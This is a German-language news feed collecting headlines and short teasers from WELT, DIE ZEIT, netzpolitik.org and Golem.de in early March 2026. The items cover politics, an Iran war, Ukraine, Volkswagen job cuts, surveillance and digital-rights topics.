„Wochenlang nur Instantnudeln essen, gehört manchmal dazu, wenn man Musiker ist“

Das südafrikanische MIAGI-Orchester zeigt, wie klassische Musik Brücken zwischen Menschen unterschiedlicher Herkunft und Hautfarbe schlagen kann. Nun kommt das Ensemble nach Deutschland.

Article link

Date of publish: Tue, 10 Mar 2026 10:50:48 GMT

ADAC-Daten offenbaren überraschenden Hamburg-Effekt

Die ADAC‑Pannenhilfe musste in Hamburg 2025 etwas seltener als im Vorjahr ausrücken. Bei der Fahrrad‑Pannenhilfe dagegen stiegen die Einsätze deutlich an.

Article link

Date of publish: Tue, 10 Mar 2026 10:50:15 GMT

„Politik beginnt mit Betrachtung der Wirklichkeit“ – Hamburgs Finanzsenator rechnet mit SPD ab

Während die SPD-Spitze laut Medienberichten auf Ruhe setzt, legt Hamburgs Finanzsenator Andreas Dressel nach der Wahl in Baden-Württemberg den Finger in die Wunde – und ruft seine eigene Partei zu Reformen für die „arbeitende Mitte“ auf.

Article link

Date of publish: Tue, 10 Mar 2026 10:49:44 GMT

„VW hat während der Corona-Krise versäumt, zu schauen, was in China passiert“

Volkswagen meldet für das vergangene Jahr einen Gewinneinbruch um fast die Hälfte auf 6,9 Milliarden Euro. „Es ist eine Mischung aus selbstgemachten Problemen und großen externen Schocks“, sagt WELT-Wirtschaftsredakteur Christoph Kapalschinski.

Article link

Date of publish: Tue, 10 Mar 2026 10:48:15 GMT

Union fordert, Iran-Flüchtlinge „ausnahmslos“ an EU-Außengrenze zu registrieren

Immer mehr Menschen fliehen nach der Eskalation in Nahost aus der Region. Die Union warnt deshalb, die Flüchtlingskrise aus 2015 dürfe sich nicht wiederholen – und pocht auf geltendes Recht. Mehr im Liveticker.

Article link

Date of publish: Tue, 10 Mar 2026 10:48:00 GMT

Für besseres Image – SPD hofft, in Epstein-Akten aufzutauchen

Trotz des desaströsen Abschneidens in Baden-Württemberg bleibt die SPD optimistisch: Möglicherweise könnte Jeffrey Epstein dabei helfen, dass man die Sozialdemokraten in Bund und Ländern wieder sympathischer findet.

Article link

Date of publish: Tue, 10 Mar 2026 10:44:00 GMT

Ungarn greift durch und deckelt Benzin- und Dieselpreise

Der Iran-Krieg treibt die Spritpreise nach oben. Die Regierung in Ungarn deckelt nun die Preise – jedoch nicht für alle Autofahrer.

Article link

Date of publish: Tue, 10 Mar 2026 10:40:30 GMT

„Man könnte sagen, es gibt zwei Wahlsieger“

Staatsrechtler Volker Boehme-Neßler bewertet bei WELT TV den Vorschlag einer gesplitteten Amtszeit für das Ministerpräsidentenamt in Baden-Württemberg als rechtlich möglich und sieht darin eine Chance für politische Experimente.

Article link

Date of publish: Tue, 10 Mar 2026 10:38:12 GMT

Biontech-Gründer verlassen Unternehmen und gründen neue Firma

Die in der Corona-Pandemie berühmt gewordenen Biontech-Gründer Ugur Sahin und Özlem Türeci werden das Unternehmen verlassen und ein neues gründen. Schon Ende des Jahres soll es so weit sein. Das ist über ihre Pläne bekannt.

Article link

Date of publish: Tue, 10 Mar 2026 10:36:40 GMT

„Ein Hauptziel Russlands in diesem Krieg ist: Wir sollen uns alle daran gewöhnen“

Russland darf auf die Biennale von Venedig zurückkehren. Der ukrainische Künstler Pavlo Makov hält das für ein Zeichen europäischer Schwäche. Im Interview erklärt er, was uns im Krieg verwundbar macht.

Article link

Date of publish: Tue, 10 Mar 2026 10:34:51 GMT

Wie Russlands „Ökonomie des Todes“ von innen aussieht

Etwa 1000 russische Männer entscheiden sich jeden Tag, für Putin in den Ukraine-Krieg zu ziehen, angelockt von hohen Prämien. Anhand einer fiktiven vierköpfigen Familie aus der Provinz lässt sich die Motivation dahinter rekonstruieren – bis in den Tod.

Article link

Date of publish: Tue, 10 Mar 2026 10:34:43 GMT

„Klopapier-Streich“ in den USA endet tödlich – 18-Jährigem droht lange Haftstrafe

Im US-Bundesstaat Georgia wollten Schüler einem Lehrer einen Streich spielen – wie zur Abschlussball-Saison üblich. In diesem Fall jedoch endete der Plan mit einer Tragödie. Die Familie des Opfers bittet die Behörden, von Strafverfolgung abzusehen.

Article link

Date of publish: Tue, 10 Mar 2026 10:34:21 GMT

„Ich bin dann zu meinem Chef und sagte: ‚Weißt du was, ich habe keinen Bock mehr. Ich kündige‘“

Guenter Mokulys ist weltweit einer der erfolgreichsten Skateboarder. Im Podcast WELTMeister erzählt der Freestyler, warum er einst für ein paar Jahre nach Amerika zog – und er spricht über ein gewisses Freiheitsgefühl.

Article link

Date of publish: Tue, 10 Mar 2026 10:33:02 GMT

Archäologen rätseln über Holzpflock in 10.500 Jahre alten Schädel eines Auerochsen

Ein Holzpflock aus Kiefernholz steckt in einem uralten Auerochsenschädel. Was steckt hinter dem mysteriösen Fund aus dem Duvenseer Moor nahe dem ältesten Grab Norddeutschlands? Für weitere Grabungen drängt die Zeit.

Article link

Date of publish: Tue, 10 Mar 2026 10:32:23 GMT

Polizei schießt auf Messerangreifer in Notaufnahme

Ein 35-Jähriger soll sichtlich verwirrt wegen einer angeblichen Vergiftung in einer Notaufnahme erschienen sein. Dann griff er eine Polizistin mit einem Messer an. Ihr Kollege setzt einen Schuss ab.

Article link

Date of publish: Tue, 10 Mar 2026 10:30:42 GMT

Per Akademiker-Visum in die Schlachtfabrik – und in die Arbeitslosigkeit

Zahlen der Regierung zur Hochgebildeten-Zuwanderung offenbaren: Auch Schlachter in der Fleischindustrie werden dazugezählt. Mit Zustimmung der Arbeitsagentur kamen Dutzende Inder zu einem Betrieb, der viele in der Probezeit kündigte.

Article link

Date of publish: Tue, 10 Mar 2026 10:30:25 GMT

„Mit diesen Drohnen können sehr schnell sekundäre Ziele angegriffen werden“

Militärexperte Gustav Gressel analysiert bei WELT TV die Kriegsziele im Iran-Konflikt, die Auswirkungen auf die Region und die Bedrohung für die Bundeswehr in Jordanien.

Article link

Date of publish: Tue, 10 Mar 2026 10:29:50 GMT

Von der Leyen bezeichnet Abkehr von Atomkraft als „strategischen Fehler“

Auf einem internationalen Treffen zur Zukunft der Atomenergie bezeichnet EU-Kommissionspräsidentin von der Leyen die Abkehr von der Atomkraft als „strategischen Fehler“. Auch Frankreichs Präsident Macron spricht sich für Atomenergie aus.

Article link

Date of publish: Tue, 10 Mar 2026 10:26:57 GMT

„Sie jagten allen Völkern Schrecken ein“ – Wie die Kelten das antike Griechenland überrannten

Kaum hatten die Generäle Alexanders des Großen die Beute verteilt, verwüsteten Invasoren Griechenland. Ihre Integration in die hellenistische Welt gelang – mit Kriegselefanten, Söldnern und globalem Kalkül.

Article link

Date of publish: Tue, 10 Mar 2026 10:26:55 GMT

„Kriegen den ganzen Frust ab, was da an Preistreiberei an der Tankstelle passiert“

Tankstellenpächter verdienen nur ein bis zwei Cent pro verkauftem Liter Sprit und sind an Preistreibereien nicht beteiligt. „Die Leute, die den Kopf für die Marke hinhalten, sollten ein bisschen mehr kriegen“, sagt Herbert W. Rabl vom Tankstellen-Interessenverband.

Article link

Date of publish: Tue, 10 Mar 2026 10:17:41 GMT

Marius Borg Høiby beantragt Freilassung aus U-Haft – Staatsanwalt reagiert offenbar mit Ablehnung

Überraschung im Prozess gegen Marius Borg Høiby: Der Sohn von Norwegens Kronprinzessin Mette-Marit will aus der U-Haft frei kommen. Das zuständige Gericht in Oslo prüft nun seinen Antrag. Der 29-Jährige ist seit Februar inhaftiert.

Article link

Date of publish: Tue, 10 Mar 2026 10:10:55 GMT

„Das Gebäude hat gewackelt, alle sind nach draußen gerannt“

Die Sicherheitslage in Erbil bleibt angespannt: Drohnenangriffe, Explosionen und Angst prägen den Alltag. Caroilna Drüten berichtet.

Article link

Date of publish: Tue, 10 Mar 2026 10:07:30 GMT

„Hat man das Gefühl, die gehen zwischendurch einen Kaffee trinken“, spottet Matthäus

In Köln schimpft der Stadionsprecher über Lautsprecher, weil der Video-Schiedsrichter nicht eingreift. Deutschlands Rekordnationalspieler Lothar Matthäus versteht den Ärger – und hat nun eine klare Forderung.

Article link

Date of publish: Tue, 10 Mar 2026 09:59:03 GMT

Iran greift Feldlager der Bundeswehr in Jordanien an

Der Iran setzt Angriffe auf Nachbarländer fort. Raketen treffen Bahrain, Saudi-Arabien, Kuwait und auch das Bundeswehr-Feldlager in Jordanien.

Article link

Date of publish: Tue, 10 Mar 2026 09:58:51 GMT

SPD verhängt offenbar „Maulkorb“ – So will CDU auf die Landtagswahl-Niederlage reagieren

„Die Regierungskoalition wird noch deutlich mehr liefern müssen als bisher“, stellt Steffen Bilger von der Union fest. Nun sollen Steuersenkungen auf den Weg gebracht werden. Die Sozialdemokraten wollen vor der nächsten Landtagswahl vor allem eins: Keine Fehler mehr machen.

Article link

Date of publish: Tue, 10 Mar 2026 09:53:00 GMT

Nachrichten: DIE ZEIT Newsfeed

Identitäre Bewegung: Rechtsextremist Martin Sellner gewinnt Klage gegen Aufenthaltsverbot

Die Gemeinde Neulingen hatte 2024 eine Lesung des Rechtsextremen Martin Sellner verhindert. Der Österreicher hat erfolgreich gegen das Aufenthaltsverbot geklagt.

Article link

Date of publish: Tue, 10 Mar 2026 10:51:03 -0000

Krieg gegen die Ukraine: Dnipropetrowsk soll fast vollständig unter ukrainischer Kontrolle sein

Das Gebiet Dnipropetrowsk ist nach Gegenangriffen offenbar teilweise wieder unter ukrainischer Kontrolle. Pistorius besorgt weitere Patriot-Raketen. Das Liveblog

Article link

Date of publish: Tue, 10 Mar 2026 10:48:40 -0000

BioNTech: BioNTech-Gründer verlassen Unternehmen und gründen neues

In der Pandemie wurden die Mediziner Uğur Şahin und Özlem Türeci mit ihrem Unternehmen BioNTech weltbekannt. Die Gründer wollen den Konzern bis spätestens 2026 verlassen.

Article link

Date of publish: Tue, 10 Mar 2026 10:44:59 -0000

Irankrieg: EU-Ratspräsident sieht Russland als einzigen Profiteur des Irankriegs

Laut EU-Ratspräsident Costa profitiert Russland unter anderem durch steigende Energiepreise. Israels Kriegsziel ist weiterhin der Sturz des Regimes im Iran. Das Liveblog

Article link

Date of publish: Tue, 10 Mar 2026 10:41:30 -0000

DLRG : Weniger tödliche Badeunfälle – aber Zahl junger Ertrunkener steigt

Die DLRG zählt 393 tödliche Unglücke in offenen Gewässern. Das sind 18 Todesfälle weniger als 2024. Die Zahl der Ertrunkenen unter 30 Jahren ist aber deutlich gestiegen.

Article link

Date of publish: Tue, 10 Mar 2026 10:25:04 -0000

Volkswagen: VW-Gewinn eingebrochen, Konzern streicht 50.000 Stellen

Volkswagen hat im vergangenen Jahr 44 Prozent weniger Gewinn gemacht. Der Autokonzern macht die US-Zölle verantwortlich. Zehntausende Stellen werden gestrichen.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:04 -0000

Krieg im Iran: Trump spricht von baldigem Kriegsende, Israel widerspricht

Der US-Präsident hat den Irankrieg als "so gut wie beendet" bezeichnet. Der Iran sei geschwächt, sagte Donald Trump. Israels Regierung ist jedoch "noch nicht fertig".

Article link

Date of publish: Tue, 10 Mar 2026 09:50:25 -0000

Terrorismus: Mutmaßlicher Beteiligter an Hamas-Anschlagsplänen festgenommen

Eine Gruppe mutmaßlicher Hamas-Terroristen soll Anschläge auf jüdische oder israelische Einrichtungen geplant haben. Ein Beteiligter wurde auf Zypern festgenommen.

Article link

Date of publish: Tue, 10 Mar 2026 09:42:13 -0000

ifo Institut: In vielen Branchen des Einzelhandels verschlechtert sich die Stimmung

Schon im Februar zeigten sich besonders Möbelhäuser und Bekleidungshandel pessimistisch. Autohäuser, Lebensmittelhandel und Baubranche sind dagegen zuversichtlicher.

Article link

Date of publish: Tue, 10 Mar 2026 08:04:35 -0000

Ukrainekarte aktuell: Ukrainische Armee stoppt russische Vorstöße in Region Saporischschja

Streitkräfte der Ukraine haben russische Truppen südlich der Stadt Saporischschja aufgehalten. Bei Kupjansk in der Region Donezk haben sie Gelände zurückerobert.

Article link

Date of publish: Tue, 10 Mar 2026 07:59:28 -0000

Bertelsmann Stiftung: Deutschlands Innovationskraft schwindet laut Studie

Nur noch 13 Prozent der deutschen Unternehmen gehören zur Innovationsspitze. Forscher warnen vor einem nachhaltigen Verlust der technologischen Wettbewerbsfähigkeit.

Article link

Date of publish: Tue, 10 Mar 2026 06:22:02 -0000

Außenhandel: Chinas Exporte steigen zu Jahresbeginn überraschend deutlich

In den ersten beiden Monaten des Jahres haben die Ausfuhren Chinas um 21,8 Prozent zugelegt. Der Handel mit den USA ging hingegen wegen der Zölle drastisch zurück.

Article link

Date of publish: Tue, 10 Mar 2026 06:06:39 -0000

Vetternwirtschaft im Bundestag: Union schlägt strengere Regeln gegen Vetternwirtschaft vor

Abgeordnete dürfen keine engen Verwandten beschäftigen. Die Union will diese Vorschrift verschärfen. Künftig sollen Angehörige auch nicht für andere Abgeordnete arbeiten.

Article link

Date of publish: Tue, 10 Mar 2026 06:01:37 -0000

Antonio Batinovic: Wie fühlt sich Burn-out an, Antonio Batinovic?

Neben der Uni baute er ein Start-up auf. Antonio Batinovic ackerte, bis sein Körper streikte. Heute redet er darüber, wie er durch die Erschöpfung wieder zu sich fand.

Article link

Date of publish: Tue, 10 Mar 2026 06:00:07 -0000

Unterstützung für den Mittelstand: Bundesregierung beendet Mikrokreditfonds

Ein Förderinstrument für kleine Firmen, die nur schwer an Kredite kommen, soll im Juni auslaufen. Die Grünen kritisieren die Entscheidung als "falsches Signal".

Article link

Date of publish: Tue, 10 Mar 2026 05:44:59 -0000

netzpolitik.org

Zuckerbrot und Peitsche: Digitalminister will Breitband-Regulierung lockern

Viele Breitbandkabel sind derzeit magentafarben, müssen es aber nicht sein. (Symbolbild) – Alle Rechte vorbehalten IMAGO / Joerg Boethling
Jahrelang konnte sich die Netzbetreiber-Branche nicht auf einen freiwilligen Open-Access-Ansatz einigen. Nun will das Digitalministerium den gordischen Knoten durchschlagen: Unter bestimmten Bedingungen sollen Wettbewerber die Marktführerin in ihre Netze lassen. Das könnte unvorhergesehene Nebenwirkungen haben.

Article link

Date of publish: Mon, 09 Mar 2026 17:10:24 +0000

Angriffe auf Journalismus, Politik und Militär: Was auf die russische Urheberschaft der Signal-Phishing-Attacken deutet

Fadenkreuz, das auf das Symbol der Signal-App auf einem handy gerichtet ist
Die Attacken zeichnen sich dadurch aus, dass sie nicht generisch auf eine sehr große Anzahl gerichtet sind, sondern auf Vertreter:innen aus Politik, Militär und Journalismus. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Adem AY / Montage: netzpolitik.org
Niederländische Geheimdienste sagen, dass Russland hinter dem Phishing steckt, bei dem auch in Deutschland prominente Personen betroffen sind. Dafür liefern sie allerdings keine Beweise. Netzpolitik.org hat in den letzten Wochen Indizien für eine russische Urheberschaft gesammelt.

Article link

Date of publish: Mon, 09 Mar 2026 15:48:00 +0000

Verhaltensscanner und Palantir: Was das Wahlergebnis in Baden-Württemberg sicherheitspolitisch bedeutet

Cem Özdemir und Manuel Hagel sitzen nebeneinander.
Cem Özdemir (Grüne) und Manuel Hagel (CDU), sicherheitspolitisch auf einer Linie. – Alle Rechte vorbehalten IMAGO / Chris Emil Janßen
Das baden-württembergische Landtagswahlergebnis gibt der grün-schwarzen Koalition freie Hand für ihre Überwachungspläne. Geht es nach den Spitzenpolitikern, kann bald jedes Dorf videoüberwacht werden, und eine KI schaut, wer sich gut benimmt. Jetzt braucht es nur noch eine lokale Palantir-Alternative.

Article link

Date of publish: Mon, 09 Mar 2026 12:50:29 +0000

Berlin: Widerstand gegen Aushöhlung der Informationsfreiheit und Datenschutzabbau

Richtungsentscheidung zur Transparenz in Berlin
Rotes Rathaus in Berlin. CC-BY 2.0 Christian Stock
Die Berliner Datenschutzbeauftragte ist mit Änderungsplänen beim Datenschutz nicht einverstanden: Europarechtliche Vorgaben seien missachtet worden. Auch geplante Einschränkungen der Informationsfreiheit kritisiert sie. Die „Fördermittelaffäre“ macht die geplanten Gesetzesänderungen zum Politikum.

Article link

Date of publish: Mon, 09 Mar 2026 12:49:45 +0000

Degitalisierung: Verdrängung

Telefon, Schallplatte, Dias, Zeitung und Co. von oben fotografiert?
Alles längst verdrängt? – Gemeinfrei-ähnlich freigegeben durch unsplash.com Julius Drost
Zeitungen, Radio, Kino, Fernsehen - all diese Medien sind nicht mehr ganz frisch, existieren aber weiterhin. Sie wurden nie völlig verdrängt. Doch was machen soziale und generative Medien mit der Medienlandschaft?

Article link

Date of publish: Sun, 08 Mar 2026 07:47:48 +0000

KW 10: Die Woche, als wir Kritik aus Kirchen hörten

Die 10. Kalenderwoche geht zu Ende. Wir haben 23 neue Texte mit insgesamt 165.684 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 07 Mar 2026 08:21:37 +0000

#305 Off The Record: Eine Recherche, die wütend macht

Menschengewusel an einem Bahnhof, in der Mitte eine Person mit einem Ortsmarker über dem Kopf
Niemals unbeobachtet – Alle Rechte vorbehalten Foto: Timon Studler / Unsplash, Ortsmarker: Imago / Zoonar, Bearbeitung: netzpolitik.org
In der neuen Folge unseres Hintergrund-Podcasts geht es um einen Fall von Nachstellung und die Rolle, die eine Spionage-App dabei spielt. Außerdem erklären wir die Fallstricke sogenannter Verdachtsberichterstattung und wie sie unsere Arbeit beeinflussen.

Article link

Date of publish: Sat, 07 Mar 2026 08:17:58 +0000

KI-gestützte Videoüberwachung in Berlin: So wehrt man sich gegen Verhaltensscanner

Eine zerstörte Videokamera liegt auf dem Boden.
Widerstand gegen Videoüberwachung hat viele Formen. – Alle Rechte vorbehalten IMAGO / Pond5 Images
Bald soll es auch in Berlin Videoüberwachung des öffentlichen Raums geben. Und dazu ein System, das analysiert, ob die gefilmten Menschen artig sind. In anderen Städten sind solche Systeme schon viel länger im Einsatz. Wir haben nachgefragt, was Berlin dort lernen kann.

Article link

Date of publish: Sat, 07 Mar 2026 08:13:48 +0000

Geheimdienstkontrolle: „Kontrolle darf nicht davon abhängen, ob der Geheimdienst freiwillig kooperiert“

Hackerraum beim BND in der ehemaligen Zentrale in Pullach
Raum für IT-Fachkräfte des BND: Die ehemalige Kommunikationszentrale in Pullach. Aus dem Buch „Nachts schlafen die Spione“. – Alle Rechte vorbehalten Martin Lukas Kim
Das Bundesverwaltungsgericht hat eine Klage der Bundesdatenschutzbeauftragten gegen den BND abgewiesen. Damit entsteht eine kontrollfreie Zone. Die Behördenchefin nennt diese Situation bei der Geheimdienstkontrolle „absurd“. Menschenrechts- und Geheimdienstexperten sehen nun die Bundesregierung in der Pflicht, eine wirkungsvolle Kontrolle zu schaffen.

Article link

Date of publish: Fri, 06 Mar 2026 14:45:45 +0000

Attacke auf die Zivilgesellschaft: Wenn der Geheimdienst Buchhandlungen ins Visier nimmt

Mann mit Anzug und Brille und geöffnetem Mund
Steht wegen der Durchleuchtung von Buchläden mit dem Verfassungsschutz in der Kritik: Wolfram Weimer. – Alle Rechte vorbehalten IMAGO / Sven Simon
Die Bundesregierung lässt jetzt sogar Buchhandlungen vom Verfassungsschutz überprüfen – ohne klare Rechtsgrundlage und ohne Wissen der Betroffenen. Mehr als 1200 Organisationen und Projekte wurden schon durchleuchtet. Wie das Haber-Verfahren die Zivilgesellschaft einschüchtert. Eine Analyse.

Article link

Date of publish: Fri, 06 Mar 2026 14:16:00 +0000

Transparenzbericht 4. Quartal 2025: Unsere Einnahmen und Ausgaben – und ganz viel Liebe

Ein Gemäldeausschnitt, der einen Sternenhimmel zeigt
Sternennacht über der Rhone – Public Domain Vincent van Gogh (1888)
Das Jahr 2025 hatte es politisch in sich. Doch am Ende erfuhren wir viel Zuspruch. Das tat gut. Und bereits am vorletzten Tag des Jahres konnten wir ein kleines Feuerwerk zünden. Das verdanken wir euch und eurer Unterstützung.

Article link

Date of publish: Fri, 06 Mar 2026 13:06:05 +0000

KI-gestützte Videoüberwachung: CCC warnt Berlin vor automatischer Verhaltenserkennung

Eine pinke Kamera mit Auge statt Linse.
Auch wenn kein Mensch den Bildschirm beobachtet: Der Verhaltensscanner prüft, ob du artig bist. – Alle Rechte vorbehalten Imago / Westend61
Laut Chaos Computer Club sind Verhaltensscanner, die Berlin bald aufbauen will, "gefährlicher Mumpitz". Er warnt das Bundesland – und auch alle anderen Städte und Länder, die die neue Technologie einsetzen oder einsetzen wollen – davor, autoritäre Staaten als Blaupause zu nutzen.

Article link

Date of publish: Fri, 06 Mar 2026 09:41:11 +0000

Betrug, Fakeshops, Heilungsmythen: Verbraucherschützer melden, Plattformen schweigen

Auf einem Bauch klebt ein rundes rotes Pflaster mit schwarzem Rand.
Werbung für „Abnehmpflaster“ auf Facebook: illegal und gehört gelöscht, sagt Verbraucherzentrale Bundesverband. – Alle Rechte vorbehalten IMAGO / Manfred Segerer
Der Bundesverband der Verbraucherzentralen sucht im Netz nach Fake-Shops, irreführender Gesundheitswerbung und schädlichen Produkten. Doch die Plattformen reagieren nur schleppend und zeigen sich wenig kooperativ – trotz gesetzlicher Pflicht, den Hinweisen der Verbraucherschützer*innen schnell nachzukommen.

Article link

Date of publish: Fri, 06 Mar 2026 05:57:27 +0000

Umfragen zum Social-Media-Verbot: Wer schlau fragt, bekommt schlaue Antworten

Ein Mann. macht eine Straßenumfrage mit Klemmbrett
Straßenumfrage (Symbolbild) – Alle Rechte vorbehalten IMAGO / Depositphotos, Bearbeitung: netzpolitik.org
Das ZDF-Politbarometer zeigt eine Mehrheit für ein Social-Media-Verbot in Deutschland. Eine Umfrage des Deutschen Instituts für Wirtschaftsforschung spricht gegen Verbote. Ja, was denn nun? Was wir von Umfragen lernen können und was nicht.

Article link

Date of publish: Thu, 05 Mar 2026 16:09:16 +0000

Interview zur Bits & Bäume Konferenz: „Wir wollen gemeinsam darüber diskutieren, welche digitale Zukunft wir anstreben“

Das Bild zeigt einen Wald von oben, durch den ein Weg führt.
Für eine nachhaltige Digitalisierung müssen neue Wege erschlossen werden. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Foto von Miha Rekar
Wie lassen sich Rechenzentren nachhaltig und ohne globale Abhängigkeiten betreiben? Darüber diskutieren Anfang März Bürger*innen, Forschende und Politiker*innen bei der Bits & Bäume Konferenz 2026 in NRW. Wir haben mit der Mitorganisatorin Anne Mollen über die Ziele der Konferenz gesprochen.

Article link

Date of publish: Thu, 05 Mar 2026 12:47:27 +0000

Russische Besatzer durchsuchen Handys: Wenn das Leben von Chats und Apps abhängt

Jemand hält ein Plakat mit der Aufschrift hoch: "Russia is a terrorist state"
Besonders im Visier: russische Besatzer suchen gezielt nach LGBTI-Menschen – Alle Rechte vorbehalten IMAGO/ ZUMA Press Wire
In der besetzten Ukraine inhaftieren, foltern und misshandeln russische Soldaten LGBTI-Personen. Es kann schon reichen, eine queere App auf dem Smartphone zu haben, um im Folterkeller zu landen. Um der systematischen Verfolgung zu entgehen, müssen sich Betroffene etwas einfallen lassen.

Article link

Date of publish: Thu, 05 Mar 2026 10:05:34 +0000

Sachsen-Anhalt: Sachverständige lehnen Palantir-Polizeigesetz ab

Tamara Zieschang im Landtag
Seit 2021 ist Tamara Zieschang Innenministerin von Sachsen-Anhalt. – Alle Rechte vorbehalten IMAGO / Jan Huebner
Heute stimmt der Landtag in Sachsen-Anhalt über das neue Polizeigesetz ab, das auch eine automatisierte Datenanalyse über Polizeidatenbanken hinweg erlauben soll. Doch trotz Nachbesserungen bleiben wesentliche Kritikpunkte. Die neuen Datenanalyse-Regeln im Gesetz hätten bei einer Prüfung in Karlsruhe wohl keinen Bestand.

Article link

Date of publish: Thu, 05 Mar 2026 08:35:53 +0000

„Kapitulation vor dem Problem“: Kritik aus der Kirche am Social-Media-Verbot

Schwarzer Umriss von Kirchtürmen vor blauem Himmel
Soziale Medien sind auch „Orientierungsraum für Glaubensfragen“ (Symbolbild) – Alle Rechte vorbehalten IMAGO / Panama Pictures; Bearbeitung: netzpolitik.org
Evangelische und katholische Jugendverbände in Deutschland finden ein Social-Media-Verbot für Minderjährige falsch. Bedenken äußern die Evangelische Kirche Deutschland (EKD) und das Bistum Köln.

Article link

Date of publish: Thu, 05 Mar 2026 04:59:26 +0000

Sex, Banking, Toilette: Intime Aufnahmen aus Metas Kamera-Brille landen in Nairobi

Ein Mann mit Locken und dicker Brille.
Meta-Chef Mark Zuckerberg trägt bei der Präsentation im September 2025 eine Überwachungsbrille. Screenshot Meta-Werbvevideo / Bearbeitung: netzpolitik.org
Manche Nutzer:innen der Überwachungsbrille filmen sich beim Sex. Das und vieles mehr landet wohl auf den Bildschirmen von Arbeiter:innen in Kenia, die im Auftrag von Meta die "KI" trainieren. Mehr als 30 von ihnen haben schwedischen Journalist:innen ihre Erfahrungen geschildert.

Article link

Date of publish: Wed, 04 Mar 2026 15:45:21 +0000

Fahrplan für Interoperabilität: EU erweitert ihre Datenbanken mit Gesichtserkennung

Gesichtserkennung in EU-Datenbanken soll erweitert werden (Symbolbild) – Gemeinfrei-ähnlich freigegeben durch unsplash.com Christelle Hayek
Die EU-Behörde eu-LISA arbeitet weiter daran, Fingerabdrücke und Gesichtsbilder zu vernetzen. Nach Einrichtung einer Superdatenbank werden jetzt noch mehr Systeme angeschlossen. Dazu gibt es einen neuen Fahrplan bis 2030.

Article link

Date of publish: Wed, 04 Mar 2026 13:10:27 +0000

Neue Strategie: EU setzt auf Künstliche Intelligenz gegen Terror

Ein Mann mit einem Headset spielt Online – oder überwacht Online-Spieler:innen, je nach Blickwinkel.
Online-Gaming-Dienste sollen stärker ins Visier von Strafverfolgungsbehörden geraten, schlägt die EU-Kommission vor. (Symbolbild) – Alle Rechte vorbehalten IMAGO / Dreamstime
In ihrer neuen Anti-Terror-Strategie setzt die EU-Kommission stark auf KI-gestützte Datenanalysen und Vorhersagen. Neben dem Blick in die digitale Glaskugel will sie unter anderem auch mehr Uploadfilter einsetzen – und Online-Gaming stärker ins Visier nehmen.

Article link

Date of publish: Wed, 04 Mar 2026 09:05:44 +0000

Berlin: Bodycams an Rettungskräften sind überflüssig

Ein Feuerwehrmensch mit einer Bodycam auf der Brust.
Bodycams können das Vertrauensverhältnis zwischen Feuerwehrleuten und Patient*innen zerstören. – Alle Rechte vorbehalten IMAGO / Berlinfoto
Berlins Feuerwehrleute fürchten, dass Bodycams bei Rettungseinsätzen das Vertrauensverhältnis zu den Patient*innen zerstören. Dennoch müssen sie welche tragen. Jetzt kam heraus: Die Aufnahmen sind nutzlos.

Article link

Date of publish: Wed, 04 Mar 2026 06:48:26 +0000

Überraschung: Ausschuss stimmt gegen freiwillige Chatkontrolle

Frau spricht in Mikrofon
Berichterstatterin: SPD-Abgeordnete Birgit Sippel. – Alle Rechte vorbehalten Europäisches Parlament
Der Justiz-Ausschuss des EU-Parlaments hat die Verlängerung der freiwilligen Chatkontrolle abgelehnt. Liberalen und Grünen geht das Gesetz zu weit, Christdemokraten geht es nicht weit genug. Nächste Woche stimmt das Parlament im Plenum darüber ab.

Article link

Date of publish: Tue, 03 Mar 2026 16:35:03 +0000

Forschende schlagen Alarm: Staaten sollen Social-Media-Verbote stoppen

Eine Teenagerin fotografiert mit dem Smartphone Hochhäuser
Ein Social-Media-Verbot für Minderjährige heißt: Urlaubsfotos machen erlaubt, Urlaubsfotos auf Instagram posten verboten (Symbolbild) – Gemeinfrei-ähnlich freigegeben durch unsplash.com Unsplash / Priscilla Du Preez
Regierungen und Parlamente weltweit sollen ihre Pläne für Social-Media-Verbote nicht weiter verfolgen. Das fordern mehr als 400 Forscher*innen aus 29 Ländern in einem offenen Brief. Sie wollen zuerst prüfen, ob Alterskontrollen überhaupt wirksam und sicher sind.

Article link

Date of publish: Tue, 03 Mar 2026 14:33:33 +0000

Nackt per Mausklick: EU-Abgeordnete wollen sexualisierte Deepfakes verbieten

Gefälschte Nacktbilder betreffen fast ausschließlich Frauen und Kinder. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Egor Komarov
In Brüssel wird momentan diskutiert, ob sexualisierte Deepfakes verboten werden sollen – und wie. Nach dem Skandal um Grok im Januar gibt es dafür gerade viel politischen Willen und mit dem KI-Omnibus eine rechtliche Möglichkeit.

Article link

Date of publish: Tue, 03 Mar 2026 12:26:38 +0000

Golem.de

Dark Patterns bei KI-Companions: Ist es Liebe?

Oder geht's nur ums Geld? Companions sind die Verführer unter den Chatbots. Sie sind eine Hilfe für manche und eine Gefahr für viele - auch für die Demokratie. Von Michael Strautmann (KI, Computersucht)

Article link

Date of publish: Tue, 10 Mar 2026 12:00:02 +0100

Bis 2030: VW plant Abbau von 50.000 Stellen in Deutschland

Der VW-Konzern hat wegen Porsche und Trump seinen Gewinn halbiert. Allein die Softwaretochter Cariad machte 2,2 Milliarden Euro Verlust. (VW, Elektroauto)

Article link

Date of publish: Tue, 10 Mar 2026 11:49:02 +0100

Anzeige: Begehrtes Tablet von Samsung bei Amazon günstig wie nie

Das Samsung Galaxy Tab A11+ mit scharfem 11''-Display, Dolby Atmos und Gemini gibt es im Frühlingsangebot bei Amazon zum neuen Tiefstpreis. (Galaxy Tab, Samsung)

Article link

Date of publish: Tue, 10 Mar 2026 11:40:02 +0100

Claude Code: KI-Agent zerstört Lernplattform mit 2,5 Jahren an Inhalten

Ein Entwickler wollte eine Webplattform von Github Pages zu AWS umziehen und ließ sich von Claude Code helfen. Doch das ging gehörig schief. (KI, AWS)

Article link

Date of publish: Tue, 10 Mar 2026 11:30:02 +0100

Anzeige: Amazon Echo Show 11 jetzt so günstig wie niemals zuvor

Der Echo Show mit 11-Zoll-Full-HD-Touchscreen und Smart-Home-Hub-Funktionen ist jetzt so günstig wie noch nie bei Amazon. (Smart Home, Display)

Article link

Date of publish: Tue, 10 Mar 2026 10:50:02 +0100

Mond: Fünf Jahre bis zum russischen Atomreaktor auf dem Mond?

